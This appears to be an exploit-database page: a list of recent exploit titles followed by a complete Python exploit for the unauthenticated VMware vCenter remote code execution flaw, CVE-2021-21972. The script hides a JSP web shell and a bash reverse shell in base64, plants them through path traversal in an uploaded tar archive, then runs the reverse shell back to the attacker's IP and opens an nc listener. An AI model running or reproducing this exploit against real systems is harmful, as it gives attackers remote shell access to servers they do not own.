
58 changes to exploits/shellcodes Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) ProFTPD 1.3.7a - Remote Denial of Service glFTPd 2.11a - Remote Denial of Service Hasura GraphQL 1.3.3 - Denial of Service Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) NBMonitor 1.6.8 - Denial of Service (PoC) Nsauditor 3.2.3 - Denial of Service (PoC) Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) Post-it 5.0.1 - Denial of Service (PoC) Notex the best notes 6.4 - Denial of Service (PoC) SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC) Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) Backup Key Recovery 2.2.7 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access vsftpd 3.0.3 - Remote Denial of Service Dlink DSL2750U - 'Reboot' Command Injection PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) Netsia SEBA+ 0.16.1 - Add Root User (Metasploit) Arteco Web Client DVR/NVR - 'SessionId' Brute Force Resumes Management and Job Application Website 1.0 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) 'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) Mini Mouse 9.3.0 - Local File inclusion rconfig 3.9.6 - Arbitrary File Upload Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS) Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated) OpenEMR 5.0.1.3 - Authentication Bypass VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection Budget and Expense Tracker System 1.0 - Authenticated Bypass Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) Blood Bank System 1.0 - Authentication Bypass Lodging Reservation Management System 1.0 - Authentication Bypass Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read Linux/x64 - /sbin/halt -p Shellcode (51 bytes) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
117 lines
No EOL
5 KiB
Python
Executable file
117 lines
No EOL
5 KiB
Python
Executable file
# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)
|
|
# Date: 06/21/2021
|
|
# Exploit Author: CHackA0101
|
|
# Vendor Homepage: https://kb.vmware.com/s/article/82374
|
|
# Software Link: https://www.vmware.com/products/vcenter-server.html
|
|
# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
|
|
# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux)
|
|
# CVE: 2021-21972
|
|
|
|
# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md
|
|
|
|
#!/usr/bin/python2
|
|
|
|
import os
|
|
import urllib3
|
|
import argparse
|
|
import sys
|
|
import requests
|
|
import base64
|
|
import tarfile
|
|
import threading
|
|
import time
|
|
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
myargs=argparse.ArgumentParser()
|
|
myargs.add_argument('-T','--target',help='The IP address of the target',required=True)
|
|
myargs.add_argument('-L','--local',help='Your local IP',required=True)
|
|
args=myargs.parse_args()
|
|
|
|
def getprompt(x):
|
|
print ("(CHackA0101-GNU/Linux)$ "+ str(x))
|
|
|
|
def getpath(path="/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp"):
|
|
fullpath="../" * 7 + path
|
|
return fullpath.replace('\\','/').replace('//','/')
|
|
|
|
def createbackdoor(localip):
|
|
# shell4.jsp
|
|
backdoor = "PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg=="
|
|
backdoor = base64.b64decode(backdoor).decode('utf-8')
|
|
f = open("shell4.jsp","w")
|
|
f.write(backdoor)
|
|
f.close()
|
|
# reverse.sh
|
|
# After decoding overwrite string 'CUSTOM_IP' for local IP
|
|
shell="IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE="
|
|
shell=base64.b64decode(shell).decode('utf-8')
|
|
shell=shell.replace('CUSTOM_IP',localip)
|
|
f=open("reverse.sh","w")
|
|
f.write(shell)
|
|
f.close()
|
|
# Move on with the payload
|
|
payload_file=tarfile.open('payload.tar','w')
|
|
myroute=getpath()
|
|
getprompt('Adding web backdoor to archive')
|
|
payload_file.add("shell4.jsp", myroute)
|
|
myroute=getpath("tmp/reverse.sh")
|
|
getprompt('Adding bash backdoor to archive')
|
|
payload_file.add("reverse.sh", myroute)
|
|
payload_file.close()
|
|
# cleaning up a little bit
|
|
os.unlink("reverse.sh")
|
|
os.unlink("shell4.jsp")
|
|
getprompt('Backdoor file just was created.')
|
|
|
|
def launchexploit(ip):
|
|
res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60)
|
|
if res.status_code == 200 and res.text == 'SUCCESS':
|
|
getprompt('Backdoor was uploaded successfully!')
|
|
return True
|
|
else:
|
|
getprompt('Backdoor failed to be uploaded. Target denied access.')
|
|
return False
|
|
|
|
def testshell(ip):
|
|
getprompt('Looking for shell...')
|
|
shell_path="/ui/resources/shell4.jsp?cmd=uname+-a"
|
|
res=requests.get('https://' + ip + shell_path, verify=False, timeout=60)
|
|
if res.status_code==200:
|
|
getprompt('Shell was found!.')
|
|
response=res.text
|
|
if True:
|
|
getprompt('Shell is responsive.')
|
|
try:
|
|
response=re.findall("b>(.+)</",response)[0]
|
|
print('$>uname -a')
|
|
print(response)
|
|
except:
|
|
pass
|
|
return True
|
|
else:
|
|
getprompt('Sorry. Shell was not found.')
|
|
return False
|
|
|
|
def opendoor(url):
|
|
time.sleep(3)
|
|
getprompt('Executing command.')
|
|
requests.get(url, verify=False, timeout=1800)
|
|
|
|
def executebackdoor(ip, localip):
|
|
url="https://"+ip+"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh"
|
|
t=threading.Thread(target=opendoor,args=(url,))
|
|
t.start()
|
|
getprompt('Setting up socket '+localip+':443')
|
|
os.system('nc -lnvp 443')
|
|
|
|
if len(sys.argv)== 1:
|
|
myargs.print_help(sys.stderr)
|
|
sys.exit(1)
|
|
createbackdoor(args.local)
|
|
uploaded=launchexploit(args.target)
|
|
if uploaded:
|
|
tested=testshell(args.target)
|
|
if tested:
|
|
executebackdoor(args.target, args.local)
|
|
getprompt("Execution completed!") |